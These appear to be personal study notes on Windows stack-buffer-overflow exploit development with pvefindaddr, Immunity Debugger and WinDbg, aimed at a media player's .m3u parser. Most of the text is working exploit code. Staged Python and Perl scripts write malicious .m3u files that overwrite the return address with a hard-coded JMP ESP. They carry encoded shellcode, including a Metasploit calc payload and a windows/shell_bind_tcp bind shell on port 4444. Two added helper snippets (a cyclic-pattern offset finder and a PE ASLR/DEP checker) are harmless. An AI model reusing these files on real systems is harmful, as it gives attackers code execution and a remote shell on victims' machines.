...and malware analysis. It has a complete graphical user interface and also ships with the most powerful Python security-tool library to date. It neatly fuses dynamic debugging with a powerful static analysis engine, and it comes with a highly customisable set of pure-Python graph algorithms that help draw an intuitive picture of a function's control flow and the basic blocks within it.
Also: windbg -I (the capital I registers WinDbg as the just-in-time debugger).
These are just study notes, nothing more. Apologies to the various sources I have reposted from.
Installation: http://redmine.corelan.be:8800/projects/pvefindaddr/wiki/Pvefindaddr_install
Usage: http://redmine.corelan.be:8800/projects/pvefindaddr/wiki/Pvefindaddr_usage
Download pvefindaddr.py and drop it into the PyCommands directory of Immunity Debugger v1.8.3; it can then be used from the debugger's command line.
Let's learn how to use it with a worked example:
pvefindaddr pattern_create 6000
Shortly you will see the prompt "check mspattern.txt". Open mspattern.txt in the Immunity Debugger directory, copy the pattern string into our exploit code, regenerate the file, then load the program in Immunity Debugger and run it with the malicious document that contains the pattern.
pvefindaddr findmsp: automated analysis of every kind; if it succeeds you get the faulting address and the overwritten SEH record.
Official description: this function will try to find the start of a so-called cyclic pattern (aka Metasploit pattern) in memory, and will also try to find the offset into the cyclic pattern that is referenced by a register, by an offset to a register, or on the stack. In addition, findmsp will also try to guess the offset to the beginning of a long string of A's. No arguments are required; all output is written to the log window.
You can see the SEH chain and the exception address.
You can of course also load it in WinDbg, where you will see the exception as well. Looking at the exception:
Either way you will see the SEH chain address 47356f47.
Next we check how many bytes it took to get there:
pattern_offset: this function will try to find the exact position of the given 4 bytes in a cyclic pattern. It takes one argument: the 4 bytes to locate. These 4 bytes can be 4 characters or 4 hex bytes; in both cases no spaces should be inserted between the characters or bytes. Even if the order of the 4 bytes has been reversed, the function will still be able to locate the exact position, counted from the start of the cyclic pattern. Syntax: pattern_offset <4 bytes>. Output is written to the log window only. We see 5115 as the offset of the exception chain address.
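As an added example (not part of this post or of pvefindaddr), here is a minimal Python re-implementation of the cyclic pattern behind pattern_create and pattern_offset, so the 47356f47 -> 5115 result above can be checked without the debugger plugin. It handles both the 8-hex-digit form a debugger shows and the reversed (little-endian) byte order the official description mentions.

```python
import binascii
import re
import string


def pattern_create(length):
    """Build the Metasploit-style cyclic pattern Aa0Aa1Aa2...Zz9 cut to `length` bytes.

    One full cycle is 26*26*10 triplets = 20280 bytes; longer requests repeat it,
    so offsets are only unique below that length."""
    cycle = "".join(u + l + d for u in string.ascii_uppercase
                    for l in string.ascii_lowercase
                    for d in string.digits)
    return (cycle * (length // len(cycle) + 1))[:length]


def pattern_offset(needle, length=20280):
    """Return the byte offset of 4 bytes inside a `length`-byte pattern, or -1.

    `needle` is either 4 characters ("Go5G") or 8 hex digits as a debugger shows a
    dword ("47356f47"). A dword read from memory is little-endian, so if the bytes
    are not found as given, the reversed order is tried as well."""
    if re.fullmatch(r"(0x)?[0-9a-fA-F]{8}", needle):
        needle = binascii.unhexlify(needle[-8:]).decode("latin-1")
    if len(needle) != 4:
        raise ValueError("need exactly 4 characters or 8 hex digits")
    pattern = pattern_create(length)
    pos = pattern.find(needle)
    if pos == -1:
        pos = pattern.find(needle[::-1])   # little-endian dword -> memory order
    return pos


if __name__ == "__main__":
    # The case from this post: a 6000-byte pattern, SEH chain overwritten with 47356f47.
    print(pattern_offset("47356f47", 6000))   # 5115
```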
Next, there is a command that can automatically propose a solution:
DEP reference: http://blog.csdn.net/zcc1414/article/details/11709405
References used for this post:
http://bbs.pediy.com/showthread.php?t=130748&highlight=pvefindaddr
```python
# Stage 1: 26000 bytes of filler followed by the cyclic pattern from pattern_create,
# so findmsp / pattern_offset can report exactly where the overwrite lands.
junk = b'\x41' * 26000
junk2 = (b'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B')
exploit = junk + junk2
try:
    # binary mode keeps the bytes exactly as generated (no CRLF translation on Windows)
    f = open(r'C:\Users\Administrator\Desktop\exploits.m3u', 'wb')
    f.write(exploit)
    f.close()
    print('File created, time to PEW PEW!')
except:
    print('Something went wrong!')
    print('Check if you have permissions to write in that folder, or if the folder exists!')
```
Next:
```python
#!/usr/bin/python
# Stage 2: 26075 bytes of filler reach the saved return address; the four 0x11 bytes
# mark EIP, followed by a NOP slide and filler to confirm control of EIP.
junk = b'\x41' * 26075
eip = b'\x11' * 4
nop = b'\x90' * 20
prejunk = b'\x42' * 700
exploit = junk + eip + nop + prejunk
try:
    f = open(r'C:\Users\Administrator\Desktop\exploits.m3u', 'wb')
    f.write(exploit)
    f.close()
    print('File created, time to PEW PEW!')
except:
    print('Something went wrong!')
    print('Check if you have permissions to write in that folder, or if the folder exists!')
```
Found that the JMP ESP address located in WinDbg did not match the address seen in OllyDbg: the DLL in the program gets relocated.
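To tell whether a module will move between sessions (and so why a JMP ESP address differs between WinDbg and OllyDbg), a defender can read the DllCharacteristics field of its PE header. The following Python is an added example, not from the post: it reports a module's preferred image base and whether it opts into ASLR (DYNAMIC_BASE) and DEP (NX_COMPAT); the PE bytes it parses are constructed inline with a made-up image base, not taken from the program discussed here.

```python
import struct

IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040   # module may be relocated (ASLR)
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100      # module is DEP compatible
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


def pe_mitigations(data):
    """Parse a PE image's headers; return image base plus ASLR and DEP opt-in flags."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt = e_lfanew + 4 + 20                   # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == PE32_MAGIC:
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == PE32PLUS_MAGIC:
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]   # same offset in PE32 and PE32+
    return {
        "image_base": image_base,
        "aslr": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
        "dep": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
    }


def make_sample_pe(image_base, dll_chars):
    """Constructed minimal PE32 header (not a real module) so the parser runs offline."""
    buf = bytearray(0x200)
    buf[:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)          # e_lfanew -> PE signature at 0x80
    buf[0x80:0x84] = b"PE\0\0"
    opt = 0x80 + 4 + 20
    struct.pack_into("<H", buf, opt, PE32_MAGIC)
    struct.pack_into("<I", buf, opt + 28, image_base)
    struct.pack_into("<H", buf, opt + 70, dll_chars)
    return bytes(buf)


if __name__ == "__main__":
    # Without DYNAMIC_BASE a module keeps its preferred base, so an address found in one
    # debugger is the same in the other; with it, the base (and any JMP ESP) can move.
    fixed = make_sample_pe(0x10000000, 0)            # 0x10000000 is a made-up base
    moving = make_sample_pe(0x10000000, IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE |
                            IMAGE_DLLCHARACTERISTICS_NX_COMPAT)
    for sample in (fixed, moving):
        print(pe_mitigations(sample))
```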
```python
#!/usr/bin/python
# Stage 3: overwrite the return address with the JMP ESP found in the debugger,
# then a NOP slide and the (encoded) shellcode.
junk = b'\x41' * 26075
jmpesp = b'\xd7\x93\xd3\x7d'   # 0x7DD393D7, little-endian
nop = b'\x90' * 25
shellcode = (b'\xD9\xEE'
             b'\xD9\x74\x24\xF4'
             b'\x58'
             b'\x83\xC0\x1b'
             b'\x33\xC9'
             b'\x8A\x1C\x08'
             b'\x80\xF3\x11'
             b'\x88\x1C\x08'
             b'\x41'
             b'\x80\xFB\x90'
             b'\x75\xF1'
             b'\xed\x79\x7b\x1b\x29\x0f\x79\x72\x98\xc0\x5e\x79\x23\x65\x80\x1d'
             b'\x9a\xe5\x9c\x6f\xe5\x22\xca\xa6\x15\x3a\xf2\x77\xaa\x22\x23\x42'
             b'\x79\x64\x62\x74\x63\x45\x22\xc3\x75\x9a\x4b\x21\x9a\x5a\x1d\x9a'
             b'\x58\x0d\x9a\x18\x9a\x78\x19\xbc\x2c\x7b\x1b\x29\x0f\x64\x14\x84'
             b'\xee\x46\xe9\x84\x71\x9a\x54\x2d\x9a\x5d\x14\x69\x12\xdc\x9a\x48'
             b'\x31\x12\xcc\x22\xee\x56\x9a\x25\xaa\x12\xe4\x88\x1e\xaf\x17\x2b'
             b'\xd5\x65\x19\xd0\xdb\x16\x12\xc1\x57\xfa\xe0\x2a\x45\x35\x0d\x64'
             b'\xf5\x9a\x48\x35\x12\xcc\x77\x9a\x2d\x6a\x9a\x48\x0d\x12\xcc\x12'
             b'\x3d\xaa\x84\x4e\xba\x46\x70\x2c\x7b\x1b\x29\x0f\x64\xb8\x22\xca'
             b'\x42\x79\x75\x70\x21\x32\x79\x32\x41\x70\x7f\x9a\xd5\x42\x41\x41'
             b'\x42\xee\x46\xed\x42\xee\x46\xe9\x81')
exploit = junk + jmpesp + nop + shellcode
try:
    f = open(r'C:\Users\Administrator\Desktop\exploits.m3u', 'wb')
    f.write(exploit)
    f.close()
    print('File created, time to PEW PEW!')
except:
    print('Something went wrong!')
    print('Check if you have permissions to write in that folder, or if the folder exists!')
```
Finally, success:
```perl
# windows/exec - 223 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=process, CMD=calc
my $file = "test.m3u";
my $junk = "\x41" x 26075;
my $jmpesp = pack('V', 0x7DD393D7);   # JMP ESP at 7DD393D7, packed little-endian
my $nop = "\x90" x 25;
my $buf =
"\xba\x9d\xae\x2f\x1c\xdb\xc5\x31\xc9\xd9\x74\x24\xf4\x5b" .
"\xb1\x32\x31\x53\x12\x83\xc3\x04\x03\xce\xa0\xcd\xe9\x0c" .
"\x54\x98\x12\xec\xa5\xfb\x9b\x09\x94\x29\xff\x5a\x85\xfd" .
"\x8b\x0e\x26\x75\xd9\xba\xbd\xfb\xf6\xcd\x76\xb1\x20\xe0" .
"\x87\x77\xed\xae\x44\x19\x91\xac\x98\xf9\xa8\x7f\xed\xf8" .
"\xed\x9d\x1e\xa8\xa6\xea\x8d\x5d\xc2\xae\x0d\x5f\x04\xa5" .
"\x2e\x27\x21\x79\xda\x9d\x28\xa9\x73\xa9\x63\x51\xff\xf5" .
"\x53\x60\x2c\xe6\xa8\x2b\x59\xdd\x5b\xaa\x8b\x2f\xa3\x9d" .
"\xf3\xfc\x9a\x12\xfe\xfd\xdb\x94\xe1\x8b\x17\xe7\x9c\x8b" .
"\xe3\x9a\x7a\x19\xf6\x3c\x08\xb9\xd2\xbd\xdd\x5c\x90\xb1" .
"\xaa\x2b\xfe\xd5\x2d\xff\x74\xe1\xa6\xfe\x5a\x60\xfc\x24" .
"\x7f\x29\xa6\x45\x26\x97\x09\x79\x38\x7f\xf5\xdf\x32\x6d" .
"\xe2\x66\x19\xfb\xf5\xeb\x27\x42\xf5\xf3\x27\xe4\x9e\xc2" .
"\xac\x6b\xd8\xda\x66\xc8\x16\x91\x2b\x78\xbf\x7c\xbe\x39" .
"\xa2\x7e\x14\x7d\xdb\xfc\x9d\xfd\x18\x1c\xd4\xf8\x65\x9a" .
"\x04\x70\xf5\x4f\x2b\x27\xf6\x45\x48\xa6\x64\x05\x8f";
open(my $FILE, '>', $file) or die "cannot open $file: $!";
binmode($FILE);   # write raw bytes; avoid CRLF translation of 0x0a on Windows
print $FILE $junk . $jmpesp . $nop . $buf;
close($FILE);
```
Reverse shell (note that the payload header below says windows/shell_bind_tcp, i.e. a bind shell listening on LPORT=4444):
```perl
# windows/exec - 223 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=process, CMD=calc
my $file = "test.m3u";
my $junk = "\x41" x 26075;
my $jmpesp = pack('V', 0x7DD393D7);   # JMP ESP at 7DD393D7, packed little-endian
my $nop = "\x90" x 25;
# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# LPORT=4444, RHOST=192.168.198.1, EXITFUNC=process,
# InitialAutoRunScript=, AutoRunScript=
my $buf =
"\x31\xc9\xb1\x56\xb8\x28\x2d\x92\x06\xd9\xcb\xd9\x74\x24" .
"\xf4\x5a\x31\x42\x0f\x03\x42\x0f\x83\xc2\x2c\xcf\x67\xfa" .
"\xc4\x86\x88\x03\x14\xf9\x01\xe6\x25\x2b\x75\x62\x17\xfb" .
"\xfd\x26\x9b\x70\x53\xd3\x28\xf4\x7c\xd4\x99\xb3\x5a\xdb" .
"\x1a\x72\x63\xb7\xd8\x14\x1f\xca\x0c\xf7\x1e\x05\x41\xf6" .
"\x67\x78\xa9\xaa\x30\xf6\x1b\x5b\x34\x4a\xa7\x5a\x9a\xc0" .
"\x97\x24\x9f\x17\x63\x9f\x9e\x47\xdb\x94\xe9\x7f\x50\xf2" .
"\xc9\x7e\xb5\xe0\x36\xc8\xb2\xd3\xcd\xcb\x12\x2a\x2d\xfa" .
"\x5a\xe1\x10\x32\x57\xfb\x55\xf5\x87\x8e\xad\x05\x3a\x89" .
"\x75\x77\xe0\x1c\x68\xdf\x63\x86\x48\xe1\xa0\x51\x1a\xed" .
"\x0d\x15\x44\xf2\x90\xfa\xfe\x0e\x19\xfd\xd0\x86\x59\xda" .
"\xf4\xc3\x3a\x43\xac\xa9\xed\x7c\xae\x16\x52\xd9\xa4\xb5" .
"\x87\x5b\xe7\xd1\x64\x56\x18\x22\xe2\xe1\x6b\x10\xad\x59" .
"\xe4\x18\x26\x44\xf3\x5f\x1d\x30\x6b\x9e\x9d\x41\xa5\x65" .
"\xc9\x11\xdd\x4c\x71\xfa\x1d\x70\xa4\xad\x4d\xde\x16\x0e" .
"\x3e\x9e\xc6\xe6\x54\x11\x39\x16\x57\xfb\x4c\x10\x99\xdf" .
"\x1d\xf7\xd8\xdf\xb0\x5b\x54\x39\xd8\x73\x30\x91\x74\xb6" .
"\x67\x2a\xe3\xc9\x4d\x06\xbc\x5d\xd9\x40\x7a\x61\xda\x46" .
"\x29\xce\x72\x01\xb9\x1c\x47\x30\xbe\x08\xef\x3b\x87\xdb" .
"\x65\x52\x4a\x7d\x79\x7f\x3c\x1e\xe8\xe4\xbc\x69\x11\xb3" .
"\xeb\x3e\xe7\xca\x79\xd3\x5e\x65\x9f\x2e\x06\x4e\x1b\xf5" .
"\xfb\x51\xa2\x78\x47\x76\xb4\x44\x48\x32\xe0\x18\x1f\xec" .
"\x5e\xdf\xc9\x5e\x08\x89\xa6\x08\xdc\x4c\x85\x8a\x9a\x50" .
"\xc0\x7c\x42\xe0\xbd\x38\x7d\xcd\x29\xcd\x06\x33\xca\x32" .
"\xdd\xf7\xfa\x78\x7f\x51\x93\x24\xea\xe3\xfe\xd6\xc1\x20" .
"\x07\x55\xe3\xd8\xfc\x45\x86\xdd\xb9\xc1\x7b\xac\xd2\xa7" .
"\x7b\x03\xd2\xed";
open(my $FILE, '>', $file) or die "cannot open $file: $!";
binmode($FILE);   # write raw bytes; avoid CRLF translation of 0x0a on Windows
print $FILE $junk . $jmpesp . $nop . $buf;
close($FILE);
```